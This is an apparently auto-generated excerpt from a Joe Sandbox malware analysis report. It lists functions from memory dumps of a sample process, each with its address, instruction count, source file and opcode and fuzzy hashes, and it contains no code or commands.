                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ededab08f7efb441eafc35b1f59cdb0b32e9584d394260c82ef320cd5dc7c201
                                                            • Instruction ID: d22437a094f9dd034b21f5fdf49f424d6dc00beda9474b40194ca8b78f54b902
                                                            • Opcode Fuzzy Hash: ededab08f7efb441eafc35b1f59cdb0b32e9584d394260c82ef320cd5dc7c201
                                                            • Instruction Fuzzy Hash: E011C422F08A0B8FEB75BA6484615F973E0EF54395B4047BAE04ED71D2EE28B8058795
                                                            Function 00007FFD9C1D1F70 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07ff004949503da94f51f8b473f5564b6bab04a8e51311ed33a176b5eec0cb11
                                                            • Instruction ID: db426205db320d534b65a6e194af1272a3321921afc3888f93ddc1edf85fb6ed
                                                            • Opcode Fuzzy Hash: 07ff004949503da94f51f8b473f5564b6bab04a8e51311ed33a176b5eec0cb11
                                                            • Instruction Fuzzy Hash: 1A110B32F09A0B4FDB68BB64C0605F973E1EF64355B5007B6D04EC71D2DE28B9058681
                                                            Function 00007FFD9BAD0C38 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a156e927d78ed1de787fb162fd13710760e0a9914d6af5c3684575bc76a5f0cf
                                                            • Instruction ID: ef634d03531b43e11dcb06b652a65e3dcaf417f3d4ed609e1053d5a3b34ca474
                                                            • Opcode Fuzzy Hash: a156e927d78ed1de787fb162fd13710760e0a9914d6af5c3684575bc76a5f0cf
                                                            • Instruction Fuzzy Hash: 2E112931B0D64E8FE721EBA8D8312ED7760EFD1321F054636D1559B2E2DA742205CB85
                                                            Function 00007FFD9C41A129 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88181e6687b797d223a53233de8852edd9e2d6a1c539cd1f97d86abb94e35c83
                                                            • Instruction ID: d50d05b680b0bf34d9993b5dc4d9e9a9b9dae7edb34a5a9e813f85265ba1f44b
                                                            • Opcode Fuzzy Hash: 88181e6687b797d223a53233de8852edd9e2d6a1c539cd1f97d86abb94e35c83
                                                            • Instruction Fuzzy Hash: 0D11FB70918A4D8FCF85EF58C859AA97BF0FF29305F05059AA448D72A1D734E954CB81
                                                            Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35fa168cf037376956ec8b1f47cbd4c5520dc7cb15d77264a5aa1f8bd917d2e8
                                                            • Instruction ID: 2d92d3a2e0d9e7da4542556a0015788fba1d67c05fbb8be1b7e6522c7327bfa5
                                                            • Opcode Fuzzy Hash: 35fa168cf037376956ec8b1f47cbd4c5520dc7cb15d77264a5aa1f8bd917d2e8
                                                            • Instruction Fuzzy Hash: E6112B31B0D64E8FE721EBA4D8312ED7760EF91311F014676D5559B2F2CA742205CB84
                                                            Function 00007FFD9C4140E8 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca51a5b742199fd8aa82e2752621feeb91627877ca57d33c54721bdc433ded70
                                                            • Instruction ID: 915de05675c69b7286ff98b5f8152665ff616dfda63f0968de3ade92d70886c5
                                                            • Opcode Fuzzy Hash: ca51a5b742199fd8aa82e2752621feeb91627877ca57d33c54721bdc433ded70
                                                            • Instruction Fuzzy Hash: 7201DB3058E7CA4FD7839F7088621E53FB0EF67214B0941ABE4C8CB093C228691AC791
                                                            Function 00007FFD9C1DDD98 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c999a1f075400d3074ed1373a9100203ee7674a2bf215ee8a30e6ae456c760c
                                                            • Instruction ID: 7d205a53417e17f347ccdb68fcac8288745560b8c10ccd457aad1ede98481c06
                                                            • Opcode Fuzzy Hash: 9c999a1f075400d3074ed1373a9100203ee7674a2bf215ee8a30e6ae456c760c
                                                            • Instruction Fuzzy Hash: A5012632F0C9078FD728AB6084B05F933A0EF95395B40477AE04ACA5D6DE28B401C294
                                                            Function 00007FFD9C1D1D98 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2925c957996405485486b7f9f28cd5e255fdf82bb18ce5c985c290c207deb6f
                                                            • Instruction ID: 7b3c0c36f62553fb51780f92ae4b3182b9598c05484430007eb3fabdfac2fe91
                                                            • Opcode Fuzzy Hash: d2925c957996405485486b7f9f28cd5e255fdf82bb18ce5c985c290c207deb6f
                                                            • Instruction Fuzzy Hash: E3012B32F0C9074FD728AB60C4B05FD73A0EF95364B5047BAD05ACA5D2DE2CA405C284
                                                            Function 00007FFD9C1DB654 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b567e57bf98a3a15093e4caa7b6547ccb43a45e0f0818d2f8d294dce6bab9432
                                                            • Instruction ID: e301f8f8f099704ba3c668978451dcb7bf9f88401474616fb1c7060385cb1cfb
                                                            • Opcode Fuzzy Hash: b567e57bf98a3a15093e4caa7b6547ccb43a45e0f0818d2f8d294dce6bab9432
                                                            • Instruction Fuzzy Hash: 8F014076E18A4E8FEBA4DF5488117E976F0FB54340F10026BF80EE72D1DE7455508B86
                                                            Function 00007FFD9C414368 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52472a86989111c085d877a2ba15bfbb207451ae54b543db28cfedd9fb7cd585
                                                            • Instruction ID: 91bff5800883c3b389892a3fd243dbb20affb12b9ca0f479e7075aa0b65f37d2
                                                            • Opcode Fuzzy Hash: 52472a86989111c085d877a2ba15bfbb207451ae54b543db28cfedd9fb7cd585
                                                            • Instruction Fuzzy Hash: D6019370914A4E9FDF84EF58C859AEA7BF0FB68315F10456AA819D32A0DB30E590CB81
                                                            Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4d6b8940ce359fd39b701678b763feed7cb235776e96f4c36e08f267e8325e7d
                                                            • Instruction ID: 958c23d4618f731784a2f67f4511987c42c2976db4bfc9b0bbbe6c4a32f4fd0a
                                                            • Opcode Fuzzy Hash: 4d6b8940ce359fd39b701678b763feed7cb235776e96f4c36e08f267e8325e7d
                                                            • Instruction Fuzzy Hash: 13012871A0E64E8FE721EBA4C8212ED7770EF86310F054676D5559B2F2DE746305CB84
                                                            Function 00007FFD9C1D72A8 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1de62ecfa9096a2ea1388b6ee13da517dc6cf1b5af6f7e135a2856e235baabe
                                                            • Instruction ID: 281925e20ba14e9cde85d668ddf3418fcb5da0981af88bf412650dc8e9b73ac0
                                                            • Opcode Fuzzy Hash: a1de62ecfa9096a2ea1388b6ee13da517dc6cf1b5af6f7e135a2856e235baabe
                                                            • Instruction Fuzzy Hash: 4301FC31F0D64F9BFB74A6B484252BE7AB1DF46384F140776E00AB7181FD68A904C399
                                                            Function 00007FFD9C417AD9 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d3891771f104c2269d821e5f503984764113bb6f7d0d46c15e8fb116c20b911
                                                            • Instruction ID: c30fa94ee0006d372621232ba930d9549e7df66a12bdd626bee0e43eb5814f5b
                                                            • Opcode Fuzzy Hash: 5d3891771f104c2269d821e5f503984764113bb6f7d0d46c15e8fb116c20b911
                                                            • Instruction Fuzzy Hash: 2D114070908A4D8FDF85EF58C858AAE7FF0FF25305F0405AAD458C71A1DB34A954CB80
                                                            Function 00007FFD9C1E05F8 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 321b791cd5979093597df4e0ce625c8a1c5545174d682232cd311da2468d53ed
                                                            • Instruction ID: 230567748d9cf1ba2b2804fa6aef855e2e960a10095babc5c7da83ee9d2e4c2e
                                                            • Opcode Fuzzy Hash: 321b791cd5979093597df4e0ce625c8a1c5545174d682232cd311da2468d53ed
                                                            • Instruction Fuzzy Hash: 8EF0FC22B1C5076BE6B84548882593BB5E6EFCD790FE0807EF04BE32C0DD54BC0152C6
                                                            Function 00007FFD9C411470 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01268d222b11b77e88425deff022662396b881d4dca3d081fbd2ac07e91534fa
                                                            • Instruction ID: c42c4fc106935a0421f0ec8e59aa9fec0688a9abaa6127843a56cec8f12b621e
                                                            • Opcode Fuzzy Hash: 01268d222b11b77e88425deff022662396b881d4dca3d081fbd2ac07e91534fa
                                                            • Instruction Fuzzy Hash: FF113630E1460A8FEB50DF98C895AFDB7F1FF28714F000169E809E3291DA38A941CF80
                                                            Function 00007FFD9C1DAABD Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c74515081dd1ebc737cd9811a125e6187be5346c2020271225d9c360d7c5b88
                                                            • Instruction ID: 8fc0bca99b62448a0ca64601f08bc1ba3435813f57bb156b70a1850d0f25f9b8
                                                            • Opcode Fuzzy Hash: 6c74515081dd1ebc737cd9811a125e6187be5346c2020271225d9c360d7c5b88
                                                            • Instruction Fuzzy Hash: 6C014213F0CA9B4FE7B8EBA884225B827B5EF15350B0003FAD04AD65C3FD08B9468249
                                                            Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 98250fafcb50043b7872c610f863b943a11a66443cfd4e048ec0131cd874dbee
                                                            • Instruction ID: 59f41b542556ebce44c2e82d21cf349ac94517e63fb33c7db487b8a682ccf89f
                                                            • Opcode Fuzzy Hash: 98250fafcb50043b7872c610f863b943a11a66443cfd4e048ec0131cd874dbee
                                                            • Instruction Fuzzy Hash: D001F770E0E68E8FE721EBA4C8602ED7770EF95314F044676D555972E2DE786304CB45
                                                            Function 00007FFD9BADA5F4 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d83d8d0c1c59087cb5a889a77c0f697ae21b3e94689369ec9cfb63f9472c7e70
                                                            • Instruction ID: 883d16d173472a86e850c4dd6741178075a236159d78cffef0dd22e3570eb24a
                                                            • Opcode Fuzzy Hash: d83d8d0c1c59087cb5a889a77c0f697ae21b3e94689369ec9cfb63f9472c7e70
                                                            • Instruction Fuzzy Hash: 8F11E671A0592D8AEB74DB54CCA86E877B1EF94305F0102EA900DA62A5CB792E85CF84
                                                            Function 00007FFD9C4134F0 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54290c5010905a4e233c81679240057d2496b958a4a22225e2ea7847065840ca
                                                            • Instruction ID: 086230738365d1b822a9f5f19f44b9c2e2b4226b80dedbaa6a6ec5373d4c001b
                                                            • Opcode Fuzzy Hash: 54290c5010905a4e233c81679240057d2496b958a4a22225e2ea7847065840ca
                                                            • Instruction Fuzzy Hash: E501BB7091490E8FDF84EF58C858ABE7BF0FB68305F10456AA41DD3254DB70A690CB80
                                                            Function 00007FFD9BAD510C Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58c17072dbacdf9c772e1a491227b2e76f3ba1984134972135a49b62149be536
                                                            • Instruction ID: 17975965daf7fdb36e4185998a924c8754890a4ac3dbc47b1ceea578ea84df7d
                                                            • Opcode Fuzzy Hash: 58c17072dbacdf9c772e1a491227b2e76f3ba1984134972135a49b62149be536
                                                            • Instruction Fuzzy Hash: 46116670D1652D9EEBB4DB54C8A47EDB6B2EBA4301F1101E9D00DA32A1CEB62BD4CF45
                                                            Function 00007FFD9C1D05D2 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f102b17ef6ca6079029837882f61e12be75047c88258d3879e9462a0da82b325
                                                            • Instruction ID: d590d9248aca253f29bc8d41fdd47234d89a095721768f588319fbdfd2c79159
                                                            • Opcode Fuzzy Hash: f102b17ef6ca6079029837882f61e12be75047c88258d3879e9462a0da82b325
                                                            • Instruction Fuzzy Hash: 4AF0C83284E2C69FD7239BB0C8714D53FB0AF43240B0501F6E445C70A2D66D1616C762
                                                            Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5445e1dc992951396930eaf1cc225443cc8c11626cdf19fa567c0b75a7d526b2
                                                            • Instruction ID: 4683397bea6effabd4798992f67d4d010d2223350d2cc50dbbaec618ad055804
                                                            • Opcode Fuzzy Hash: 5445e1dc992951396930eaf1cc225443cc8c11626cdf19fa567c0b75a7d526b2
                                                            • Instruction Fuzzy Hash: F9F03030A0950E9FEB60EF98D4596FD77A0FFA8704F514536E41CC21A0DAB46690CB84
                                                            Function 00007FFD9C41AC40 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5af1cae38a815c917ebc91a49e8159e765fdcd75fdcbbeff5c189ace30fc30ab
                                                            • Instruction ID: 00a5c1fe4150efb7b7e2344e975772e5fbbe615208a56ba8e66d5dafb2ecf4c4
                                                            • Opcode Fuzzy Hash: 5af1cae38a815c917ebc91a49e8159e765fdcd75fdcbbeff5c189ace30fc30ab
                                                            • Instruction Fuzzy Hash: 16F0F930914A4E8FDB50EF68C849AEA7BF0FF28349F50456AE818D2154DB34A1A0CB81
                                                            Function 00007FFD9C41D552 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4119383aa9712a7fb4f8736392d11a51118d8ad522ead39c560e6b66caeeb913
                                                            • Instruction ID: 448c575b58d0faf598009b86b4c535dbffa7830047f0a2b3fbbcbafe76b34b61
                                                            • Opcode Fuzzy Hash: 4119383aa9712a7fb4f8736392d11a51118d8ad522ead39c560e6b66caeeb913
                                                            • Instruction Fuzzy Hash: A0F090B1F0854E4BF754EFA888766ADB7B1EF64358F000035E059DB29ACE7878428741
                                                            Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42b1648d3ab2de70b3d8a7d00c8a1d6987573fa70eb48636ab00ac7be595783b
                                                            • Instruction ID: 5ddc262ed1f10da21a5b7abb284020bc699819be510d9add13288dd24ee8e578
                                                            • Opcode Fuzzy Hash: 42b1648d3ab2de70b3d8a7d00c8a1d6987573fa70eb48636ab00ac7be595783b
                                                            • Instruction Fuzzy Hash: AAF01230A1554E9FDF90EF64C4596FE77E0FF58304F414576E81CD2160DA70A6A0CB80
                                                            Function 00007FFD9C1DCFEF Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                            • Instruction ID: 000b590d6d06b647d61607921931abdab0c09c44f5fcfabad5ceb1ef67b6e18e
                                                            • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                            • Instruction Fuzzy Hash: BBF0B27490A9599FCB55EAA8C85AE99BBB0FF68310F10029DD00AEB262CA219845CF40
                                                            Function 00007FFD9BAD7127 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction ID: 892b278ea6e4599c6bd6d3c96a92942b25519fedc7163ef9ea4723b1c3f007a6
                                                            • Opcode Fuzzy Hash: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction Fuzzy Hash: 26F07D70E1A51D8EEB74DB54C868BEDB771EB94300F1141F9D10EA6292CAB41F81CF04
                                                            Function 00007FFD9C414120 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8c40623735b0350bb64603304fc5358aa96462f1f01dbeb35e906952813bc808
                                                            • Instruction ID: 415b84aafa3d469d2337b5fb5160cbbe9704da8bb00e756a6ee44106c6e55051
                                                            • Opcode Fuzzy Hash: 8c40623735b0350bb64603304fc5358aa96462f1f01dbeb35e906952813bc808
                                                            • Instruction Fuzzy Hash: 9DE04630A04A0E8FDB94EF54E9066EA77A0FF68308F004A26E85CC3184CB74A664CBC1
                                                            Function 00007FFD9C1DAB25 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7f7a287bd8fffec358b2585448bd48a42e2eaf1678066a17b37eb9cfd427c94
                                                            • Instruction ID: 0a2c12a8da1055686c993e07d30c9cb31750d7852a056ce9bb6db96d375a6222
                                                            • Opcode Fuzzy Hash: e7f7a287bd8fffec358b2585448bd48a42e2eaf1678066a17b37eb9cfd427c94
                                                            • Instruction Fuzzy Hash: CBE0DF32D1D38A8BD771CB60C8660EC7F30BF00340F1802EBE94867182FB386708A682
                                                            Function 00007FFD9C1DD2F7 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9aca51ecb88904339a749a9ce3cb7e4982f025504acc00b4ab4a116747e51da
                                                            • Instruction ID: 6484ee9b31c563a2993a0368d916fea88ad2488cf6f4e3bb33ee5308918831e2
                                                            • Opcode Fuzzy Hash: a9aca51ecb88904339a749a9ce3cb7e4982f025504acc00b4ab4a116747e51da
                                                            • Instruction Fuzzy Hash: 0AE08652F0D2835BF736177448611747BA08F0728471907B5D1455A1C3D85438049325
                                                            Function 00007FFD9C1D1DCB Relevance: .0, Instructions: 11COMMON
